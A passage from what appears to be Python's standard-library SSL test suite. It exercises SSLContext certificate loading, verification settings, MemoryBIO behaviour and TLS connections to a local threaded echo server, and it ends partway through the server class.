ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
